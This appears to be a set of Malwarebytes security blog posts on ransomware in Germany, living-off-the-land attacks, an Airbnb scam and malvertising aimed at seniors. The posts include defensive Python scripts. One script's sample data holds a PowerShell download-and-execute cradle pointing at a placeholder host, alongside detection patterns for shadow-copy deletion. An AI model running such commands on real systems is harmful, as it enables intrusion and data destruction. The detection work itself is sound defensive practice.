  • Avoid the pressure pitch. Tax scammers like to hurry you along to data theft and malware installs. Claims of only having 24 or 48 hours to file for a refund should be treated with skepticism. As with most solutions for these forms of social engineering, contact the tax entity directly.


Ransomware in Germany, April 2022 – March 2023

This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are attacks that appear on a gang's leak site, which generally means the victim opted not to pay a ransom. Leak sites give the best overall picture of ransomware activity available, but the true number of attacks, including victims who paid quietly, is far higher.

Between April 2022 and March 2023, Germany was a globally significant target for ransomware gangs. During that period:

  • It was the fourth most attacked country in the world, and the most attacked in the EU
  • The construction sector was harder hit than in the USA, UK, or France
  • LockBit and Black Basta accounted for 54% of known attacks
  • Black Basta attacked targets in Germany far more often than in the UK or France

In August 2022, German power semiconductor manufacturer Semikron disclosed a ransomware attack that had partially encrypted its network, with the attackers claiming to have stolen 2TB of documents.

In the same month, German automotive parts powerhouse Continental was attacked by LockBit, which claimed to have stolen 40TB of files. The company broke off negotiations in late October, and the ransomware gang offered the data for sale or destruction for $50 million, the biggest known ransom demand of 2022, and the largest this author had seen until LockBit's equally outlandish demand for $80 million from Royal Mail in early 2023.

Stolen Continental data available for sale or destruction

A ransomware attack on German newspaper Heilbronner Stimme in October 2022 disrupted its printing systems, forcing the publication of a six-page emergency edition. The attack affected the entire Stimme Mediengruppe, including companies Pressedruck, Echo, and RegioMail, with Echo’s website and e-paper accessibility also compromised. Editor-in-chief Uwe Ralf Heer reported that a well-known cybercriminal group encrypted its systems and left ransom demands, but did not specify further.

In November 2022, the Vice Society ransomware gang claimed responsibility for a cyberattack on the University of Duisburg-Essen (UDE). The attackers leaked files including backup archives, financial documents, research papers, and student spreadsheets. On January 9, 2023, the university announced that due to extensive and complex damage caused by the attack, its entire IT infrastructure would need to be reconstructed.

Germany is a prime target

In the 12 months from April 2022 to March 2023, Germany was a globally significant target for ransomware, ranking as the fourth most attacked country by known attacks. It was the most attacked country in the EU, and the most attacked country where English isn't the principal language.

Known attacks in the ten most attacked countries between April 2022 – March 2023

Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first-and-foremost, a USA problem. It is not. The size and nature of the US economy means that it has many more targets for ransomware gangs than other countries in the top ten.

We can account for the difference in the size of countries’ economies by dividing the number of known ransomware attacks by a country’s nominal GDP, which gives us an approximate rate of attacks per $1T of economic output. On that basis, the difference between the countries in the top ten is far smaller than the total number of known attacks would suggest. The top ten most attacked countries all suffered between 15 and 66 known attacks per $1T of economic output.

The ten most attacked countries between April 2022 – March 2023, ordered by attacks per $1T GDP

The size of the countries in the top ten also varies enormously, and we can try to account for that by dividing known attacks by each country's population. On that measure, again, the differences between countries are much smaller than a simple count of known attacks suggests.

On a known attacks per capita basis, Germany sits in a cluster of four advanced European economies with nearly identical rates of attack. In all the variations of our top ten, English-speaking countries occupy at least three of the top five positions, and English-speaking countries with smaller populations and economies, like Canada and Australia, seem to suffer disproportionately.

The situation in Germany is far from good, it just isn’t quite as bad as in the very worst countries. By any measure, Germany is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs.

The ten most attacked countries between April 2022 – March 2023, ordered by attacks per capita

As in most countries, the German services sector is the hardest hit, accounting for 28% of known attacks in the last 12 months, slightly above the global average of 25%. In most respects, German industry sectors are attacked in roughly the same proportions as in the UK and France, with some notable exceptions. There were no known attacks on German healthcare in the last 12 months (which, again, says nothing about unknown attacks), the country suffered fewer attacks on its legal services than either the UK or France, and it does not seem to share the problems France has had protecting its government sector, or the UK its education sector.

Where Germany suffers more than its neighbours is construction. Its 12% share of known attacks is double the global average, and notably higher than the USA (7%), UK (7%), and France (5%).

Known ransomware attacks by industry sector in Germany, April 2022 – March 2023

Black Basta’s hunting ground

In the UK, no individual ransomware was used in more than two known attacks on construction. In France one gang, LockBit, recorded three. In Germany, two different gangs recorded five known attacks against construction, accounting for a little over two thirds of the total. One of those gangs was LockBit, which is unsurprising given its position as by far the most used ransomware globally. The other was Black Basta, which recorded more attacks against German construction targets in 12 months than it did in the whole of France in the same period.

It seems Black Basta has an appetite for German targets. In the last 12 months it was the second most used ransomware in Germany, with 27 known attacks. In the same period it was busy in the UK with 10 attacks, though overshadowed there by LockBit, Vice Society and others, and it recorded just three attacks in France, where LockBit absolutely dominated.

Ransomware with two or more known attacks in Germany, April 2022 – March 2023

In the last year, Black Basta and LockBit were the only ransomware that registered more than four known attacks in a month, with both going as high as eight. Between them, the two groups accounted for 54% of known attacks in Germany and largely determined whether the country would have a bad month at the hands of ransomware gangs or a terrible one.

Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 – March 2023

Black Basta does not reinvent the wheel in the way it operates. Similar to other ransomware groups, attacks frequently begin with initial access gained through phishing attacks. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, CobaltStrike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaked data over its victims. The data is generally stolen using Rclone, which filters and copies specific files to a cloud service. After the data is exfiltrated, the ransomware encrypts files with the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

Conclusions

In the last 12 months, Germany was a globally significant hunting ground for ransomware gangs, and the country with the fourth highest total of known attacks. Across the various industry sectors, construction was over-represented, suffering a higher proportion of known attacks than the construction sectors in the USA, France, and the UK. Much like the education sector in the UK and the government sector in France, it should be alarming that, with an entire world of targets to choose from, it has attracted a disproportionate amount of attention.

In particular, the German construction sector suffered at the hands of LockBit and Black Basta; the latter displayed a liking for German targets of all kinds and was the second most used ransomware in the country. Black Basta recorded considerably more attacks in Germany in the last year than in either the UK or France. In fact, the only country in the world to suffer more Black Basta attacks in the last twelve months than Germany was the USA.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight

Regular readers of our monthly ransomware review (read our April edition here) know that Ransomware-as-a-Service (RaaS) gangs have been making headlines globally with their disruptive attacks on organizations.

Sometimes, though, it’s not enough merely to know about the problem.

In order to truly protect ourselves from RaaS gangs, we have to ‘peel back the onion’, so to speak, and get a closer look at how, exactly, they behave. If we know how RaaS gangs evade detection once in a network, for example, we may be able to kick them out before they can do any damage.

One of the most concerning behaviors we’ve observed from RaaS gangs is their use of Living off the Land (LOTL) attacks, where attackers leverage legitimate tools to evade detection, steal data, and more.

Let’s dive into the dangers of LOTL attacks in RaaS operations and provide guidance for under-resourced IT teams on how to detect and block such threats.

The deceptive nature of LOTL attacks

In an ideal world, IT teams whose organizations are under attack would have clear and direct evidence of the malicious activity.

For example, if unusual network connections are being made to remote IP addresses associated with known malicious actors, then there’s little doubt that you’re under attack—enabling IT to put a halt to the behavior early on.

But now imagine you’re diligently monitoring a network for any signs of suspicious activity. As you scan a seemingly endless stream of logs, searching for any anomalies that could signal trouble, you notice some activity from PowerShell, a versatile and legitimate scripting tool.

Script Block Logging records all blocks of code as they are executed by PowerShell, which could point you to suspicious activity.

Namely, there are scripts using commands that an attacker could use to steal data from the company’s network, but which also resemble the legitimate administrative tasks IT professionals run for routine system administration. Considering it’s regular business hours, you figure it’s part of a routine IT maintenance operation and move on.

But, lo and behold, it was a RaaS gang the whole time!

The attacker had studied the company’s environment and had a deep understanding of the tools and processes typically used by employees, and so they managed to avoid raising suspicion by blending in with typical PowerShell usage. By conducting the attack during normal business hours, the attackers also avoided any of the usual scrutiny that would come from moving across a network late at night. 

This is exactly why LOTL attacks are so dangerous: by mimicking normal behavior, LOTL attacks make it extremely difficult for IT teams and security solutions to detect any signs of malicious activities. Experienced analysts, however, might be able to pick up on subtle anomalies or patterns that indicate a LOTL attack, leveraging their expertise and deep understanding of system behaviors.

On the other hand, new or under-resourced teams may struggle to identify such attacks due to a lack of experience or insufficient tools, leaving them vulnerable to these stealthy threats.
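The scenario above turns on reviewing Script Block Logging (Event ID 4104) without an off-hours crutch. The following is an added example, not Malwarebytes’ code: it scores constructed 4104 script blocks against a small set of weighted indicators and skips scripts a reviewer has already allowlisted by hash. The indicator weights, threshold, users, hosts and URLs are all hypothetical.

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104).
Added example, not Malwarebytes' code; the events are constructed stand-ins for
records from the Microsoft-Windows-PowerShell/Operational log."""
import hashlib
import re
from dataclasses import dataclass

@dataclass
class ScriptBlockEvent:
    record_id: int
    user: str
    host: str
    script_block_text: str

# Indicator name -> (pattern, weight). Weights are a hypothetical choice for this
# example; tune them against your own environment's baseline.
INDICATORS = {
    "encoded_command": (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I), 2),
    "base64_decode": (re.compile(r"FromBase64String", re.I), 1),
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), 1),
    "invoke_expression": (re.compile(r"\b(Invoke-Expression|iex)\b", re.I), 1),
    "archive_staging": (re.compile(r"Compress-Archive", re.I), 1),
    "shadow_copy_delete": (re.compile(r"vssadmin\s+delete\s+shadows|Win32_ShadowCopy", re.I), 3),
}
ALERT_THRESHOLD = 2  # two weak indicators, or one strong one

def normalize(text: str) -> str:
    """Collapse whitespace so cosmetic edits do not defeat the allowlist."""
    return " ".join(text.split())

def script_hash(text: str) -> str:
    return hashlib.sha256(normalize(text).encode("utf-8")).hexdigest()

def score_event(event: ScriptBlockEvent):
    """Return (score, [matched indicator names]) for one script block."""
    hits = [name for name, (pat, _) in INDICATORS.items()
            if pat.search(event.script_block_text)]
    return sum(INDICATORS[n][1] for n in hits), hits

def triage(events, known_good_hashes):
    """Score every event not on the allowlist; return findings, highest score first.
    Time of day is deliberately not a feature: the intrusion described above ran
    during business hours, so an off-hours heuristic would have missed it."""
    findings = []
    for ev in events:
        if script_hash(ev.script_block_text) in known_good_hashes:
            continue  # reviewed maintenance script: skip rather than alert nightly
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            findings.append({"record_id": ev.record_id, "user": ev.user,
                             "host": ev.host, "score": score, "indicators": hits})
    return sorted(findings, key=lambda f: f["score"], reverse=True)

# Constructed sample events; users, hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1, "svc_backup", "FS01",          # nightly backup job
        "Compress-Archive -Path D:\\Exports -DestinationPath \\\\backup01\\nightly\\exports.zip\n"
        "Invoke-WebRequest -Uri http://backup01.corp.example/ping -Method Post"),
    ScriptBlockEvent(2, "jsmith", "WS042",             # classic download cradle
        "$c = New-Object Net.WebClient; iex $c.DownloadString('http://example.invalid/update.ps1')"),
    ScriptBlockEvent(3, "helpdesk", "WS017",           # routine helpdesk query
        "Get-Service | Where-Object Status -eq 'Stopped' | Select-Object Name"),
    ScriptBlockEvent(4, "jsmith", "WS042",             # encoded command line
        "powershell.exe -EncodedCommand " + "QQBB" * 15),
]
# The backup script looks like data staging (archive + web request); after review
# it is allowlisted by hash so it stops alerting without weakening the rules.
KNOWN_GOOD = {script_hash(SAMPLE_EVENTS[0].script_block_text)}
```

On a live host the same `triage` function can be fed the ScriptBlockText field of real 4104 records; the allowlist is what keeps a scoring rule this blunt from drowning in routine admin noise.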

5 LOTL tools used by ransomware gangs 

While attackers use a seemingly innumerable range of legitimate tools for LOTL attacks, below are five of the most common ones we’ve seen the most active ransomware gangs using in their attacks.

| Tool | Used For | Used To | Used By |
| --- | --- | --- | --- |
| PowerShell | Versatile scripting language and shell framework for Windows systems | Execute malicious scripts, maintain persistence, and evade detection | LockBit, Vice Society, Royal, BianLian, ALPHV, Black Basta |
| PsExec | Lightweight command-line tool for executing processes on remote systems | Execute commands or payloads via a temporary Windows service | LockBit, Royal, ALPHV, Play, BlackByte |
| WMI | Admin feature for accessing and managing Windows system components | Execute malicious commands and payloads remotely | LockBit, Vice Society, Black Basta, Dark Power, Cl0p, BianLian |
| Mimikatz | Open source tool for Windows security and credential management | Extract credentials from memory and perform privilege escalation | LockBit, Black Basta, Cuba, ALPHV |
| Cobalt Strike | Commercial penetration testing tool used to assess network security and simulate advanced threat actor tactics | Command and control, lateral movement, and exfiltration of sensitive data | LockBit, Black Basta, Royal, ALPHV, Play, Cuba, Vice Society |

Again, readers of our monthly ransomware review will recognize that the gangs listed here are responsible for the lion’s share of yearly ransomware attacks.

LockBit, for example, topped our 2023 State of Malware Report, being responsible for more than three times as many attacks as the next most active ransomware, ALPHV. In February 2023 alone, the LockBit group listed 126 victims on its leak page.

Vice Society, on the other hand, is responsible for 70 percent of known attacks on UK education institutions.

Advice for IT teams

The four tips listed below, which combine cutting-edge technology with specialist expertise, can greatly help IT teams uncover LOTL attacks:

1. Regularly monitor network traffic and logs

  • Regularly analyze your network traffic for any unusual patterns or connections to known malicious IP addresses or domains associated with the use of tools like Chisel, Qakbot, or Cobalt Strike. 
  • Enable logging on critical systems (firewalls, servers, and endpoint devices) and regularly review logs for unusual activities or signs of compromise.

2. Stay informed of the latest threat intelligence

  • Leverage threat intelligence feeds to stay informed about new attack techniques, indicators of compromise (IOCs), and other relevant threat data.
  • Use this data to fine-tune your security monitoring, detection, and response capabilities to identify and mitigate LOTL attacks.

3. Leverage behavioral analysis and anomaly detection

  • Implement advanced monitoring tools that focus on detecting unusual user or system behavior rather than relying solely on known signatures or patterns.
  • Machine learning and artificial intelligence can be leveraged to identify deviations from normal behavior, which might indicate an ongoing LOTL attack.

Malwarebytes EDR observes the behaviors of processes, registry, file system, and network activity on the endpoint using a heuristic algorithm looking for deviations. Here you can see all detection rules triggered in the suspicious activity and their mapping to MITRE ATT&CK.

4. Restrict the abuse of legitimate tools

  • Focus on managing and controlling the use of legitimate tools and system features often exploited in LOTL attacks.
  • Limit access to certain tools to only those users who require them, monitor their usage, and apply specific security policies to restrict potentially harmful actions.

In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper hand against RaaS gangs that employ LOTL techniques.

24×7 security monitoring and threat hunting for your organization

Monitoring network traffic, enabling and reviewing logs, checking for anomaly detection, and implementing application control are essential steps for detecting and blocking malicious activity. However, these efforts often require around-the-clock coverage and deep cybersecurity expertise, which can be difficult for small and medium-sized organizations to maintain.

This is where Malwarebytes Managed Detection and Response (MDR) comes in.

Malwarebytes MDR analysts are experienced in detecting malicious use of legitimate tools and blocking attackers. They use their expertise to identify unusual patterns or connections to malicious IP addresses, domains, or unauthorized application usage related to the LOTL attacks conducted by the RaaS gangs.

By partnering with Malwarebytes MDR, businesses can enhance their security posture and gain peace of mind, knowing that a skilled team of security experts is working 24x7x365 to proactively detect and respond to potential threats. Find more MDR resources below!

Woman tracks down and turns table on Airbnb scammer

The internet is full of Airbnb scams and accounts told by victims. But there is a twist in this latest story-gone-viral that is usually lacking in most narratives: The victim evens the score.

Airbnb host and scammer “Mr. Tyler” met his match when his would-be guest, TikTok user Olivia (@livvoogus), discovered his personal information after arriving at a property in Florida she could not get into. Her scam suspicions were confirmed that day.

In a TikTok clip detailing the events, she revealed she booked the place months before the New Year’s Eve music festival she and her friends planned to attend. The listing didn’t raise any red flags, and Mr. Tyler was a Superhost—described as “the best-rated, most experienced hosts” by Airbnb. The property also had good reviews.

Then things got sketchy while driving up to Jacksonville.

“The Airbnb host had sent us two different codes for the door and just stopped responding to any questions that we had, like where to park or how to get into the building—just kind of went ghost,” Olivia said. The neighbor came out and told them that a couple who came by last night also couldn’t get in, suggesting they were not the only ones Mr. Tyler scammed.

“The person who had lived there got evicted because, according to the lease, you’re not allowed to do Airbnbs out of the apartment, and he just never took the listing down,” she said.

Enraged, Olivia searched the internet for details about her host and eventually found his name, birthday, and parents’ address. She messaged Mr. Tyler to ask if she was supposed to meet him at his parents’ place, the address of which she included, because what he gave them was the incorrect address.

“This man called me back. So. Quickly,” Olivia enthused. What came next was also recorded and posted on TikTok. The clip was captioned, “when you travel long and far to find out your airbnb is fake and you go to extreme lengths to find out everything about the host and then call them to expose such information.”

In the end, Airbnb refunded Olivia, and she found a hotel room. The company paid a percentage of the cost for the following night, although Olivia believes Airbnb should’ve paid for it all. One TikTok commenter jokingly suggested that Olivia “send a bill to Tyler’s parents’ house”.


Massive malvertising campaign targets seniors via fake Weebly sites

Knowing their audience is something scammers excel at, and for very good reason. This is particularly true for tech support scammers whose prime targets are seniors.

By understanding what retirees are searching for and abusing various online platforms, crooks can precisely go after the demographic they are interested in and lure them onto sites that they control.

We have been observing a specific malvertising campaign via Google ads aimed at seniors. The threat actor is creating hundreds of fake websites via the Weebly platform to host decoy content to fool search engines and crawlers while redirecting victims to a fake computer alert.

Based on our analysis, this particular scheme started sometime in the summer of 2022 but has drastically increased in prevalence in the past month. While we have been sharing details with affected parties privately for a few weeks, we are now exposing what we know. 

Popular search terms

Malvertising, or the use of ads to deliver malicious content, is not something new. Yet, over the years various threat actors have used it for different purposes.

It is a cost-effective and efficient way to reach targets and then monetize them with a payload that can be anything from malicious software to plain old scams. But we don’t tend to hear about the latter as much, because the impact of scams may be harder to quantify.

In talking to victims, you will often hear them describe that they were just looking something up and clicked somewhere when all of a sudden this or that happened.

As we saw an increase in our telemetry for tech support scam pages, we decided to replicate some of those searches and came up with keywords we thought the senior/retired audience might use often. In order to maximize our chances of identifying the campaign we used a real machine and prepared with a specific profile.

By far, anything related to recipes and cooking is a popular search query. We had previously identified another malvertising campaign using this same theme.

We also tried to look for games such as Solitaire:

And of course, we couldn’t do without checking on the weather:

Decoy sites

While the links for the sponsored sites may look legitimate, they aren’t. The problem is that unless you are the intended victim, you will only see the clean content. It matters because crawlers and other ad quality check tools may validate the advertiser and allow the ad to be reached by a large audience.

Each site is very simple and contains content that was stolen from somewhere else and put together hastily.

The threat actor has been creating hundreds of those websites via the Weebly platform which they are abusing. Some days, we saw an average of 10 new Weebly hostnames used by the scammers.

Cloaking

As mentioned earlier, it is important for the scammers to stay under the radar and make it as though these webpages are legitimate. They can do this easily by using a technique known as cloaking.

Cloaking is simply showing different content based on the target audience, which lets the scammers hide the payload from undesirable visitors (i.e. web crawlers, security researchers).

The scammers did this in various ways, some quite simple (user-agent and IP check) but they also paid for a professional cloaking service.

The cloaker API will return a response that contains two different links:

  • The “safe_page” which is the URL for the decoy Weebly site

  • The “money_page” which is the URL to make money from

In this case the money page is a URL belonging to Digital Ocean and hosting a tech support scam page.
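The safe_page/money_page split above gives defenders a simple test: fetch the same advertised URL as a crawler and as an ordinary browser, and compare where each lands and what it shows. The following is an added example, not Malwarebytes’ code; the fetch function is injected so the check runs offline against a constructed stand-in for the cloaker, and the user-agent strings, hostnames and page bodies are all placeholders.

```python
"""Spot cloaking: does a landing page differ for a crawler and a real visitor?
Added example, not Malwarebytes' code. `fetch` is injected so the check runs
offline here; swap in a real HTTP client (from an analysis sandbox, never a
production workstation) to examine live URLs."""
import hashlib
from dataclasses import dataclass
from urllib.parse import urlsplit

@dataclass
class FetchResult:
    final_url: str   # URL after following every redirect
    body: str        # response body as text

# Hypothetical user-agent strings; only the crawler/browser contrast matters.
CRAWLER_UA = "Mozilla/5.0 (compatible; ExampleBot/1.0; +http://example.invalid/bot)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/112.0 Safari/537.36"

def body_fingerprint(body: str) -> str:
    """Hash whitespace-normalised text so cosmetic differences don't count."""
    return hashlib.sha256(" ".join(body.split()).encode("utf-8")).hexdigest()

def check_cloaking(url: str, fetch) -> dict:
    """Fetch `url` twice and report whether crawler and browser see the same thing."""
    as_crawler = fetch(url, CRAWLER_UA)
    as_browser = fetch(url, BROWSER_UA)
    crawler_host = urlsplit(as_crawler.final_url).hostname
    browser_host = urlsplit(as_browser.final_url).hostname
    verdict = {
        "url": url,
        "crawler_final_url": as_crawler.final_url,
        "browser_final_url": as_browser.final_url,
        # A cloaker's safe_page stays on the decoy host; its money_page does not.
        "redirect_mismatch": crawler_host != browser_host,
        "content_mismatch": body_fingerprint(as_crawler.body) != body_fingerprint(as_browser.body),
    }
    verdict["cloaking_suspected"] = verdict["redirect_mismatch"] or verdict["content_mismatch"]
    return verdict

# Constructed stand-ins for the two behaviours (hostnames and bodies are placeholders).
DECOY_BODY = "<h1>Easy Weeknight Recipes</h1><p>Copied recipe text goes here.</p>"
ALERT_BODY = "<h1>Your computer is locked</h1><p>Call the number on screen.</p>"

def cloaked_fetch(url: str, user_agent: str) -> FetchResult:
    """Mimics the cloaker: crawlers get the decoy, browsers go to the money page."""
    if "ExampleBot" in user_agent:
        return FetchResult(url, DECOY_BODY)
    return FetchResult("https://money-page.example/alert", ALERT_BODY)

def honest_fetch(url: str, user_agent: str) -> FetchResult:
    """A site that serves everyone the same page, apart from a whitespace tweak."""
    spacing = "\n\n" if "ExampleBot" in user_agent else " "
    return FetchResult(url, DECOY_BODY.replace("</h1>", "</h1>" + spacing))

if __name__ == "__main__":
    print(check_cloaking("https://decoy-site.example/recipes", cloaked_fetch))
    print(check_cloaking("https://decoy-site.example/recipes", honest_fetch))
```

Because the scammers also key on the visitor’s IP address, a page that looks clean from one network should be rechecked from a different one before it is cleared.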

Tech support scam

Most scammers will use a template for the tech support scam page which is customized for the operating system and browser the victim is running. This scheme is adapted for both Windows and Mac, supporting the Chrome, Opera, Safari and Firefox browsers.

In this case they are also abusing a browser feature, the Keyboard Lock API (navigator.keyboard.lock), that lets a page in fullscreen capture keystrokes. What this means in practical terms is that the user will not be able to exit the fullscreen page unless they press and hold the Escape key for several seconds. Many people will panic and call the phone number on the screen, only to fall into the hands of scammers and lose hundreds, sometimes even thousands, of dollars.

Protection from malvertising attacks

Malvertising can come in different forms and ad formats, and the same can be said about the payloads that are distributed.

As we saw earlier this year, clicking on the top ad for a software download doesn’t always get you what you wanted; in fact, it can infect your computer with malware. Threat actors are very good at impersonating legitimate brands and setting up convincing websites.

We have reported and continue to report this malvertising campaign to Google and Block Inc. (Weebly).


We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.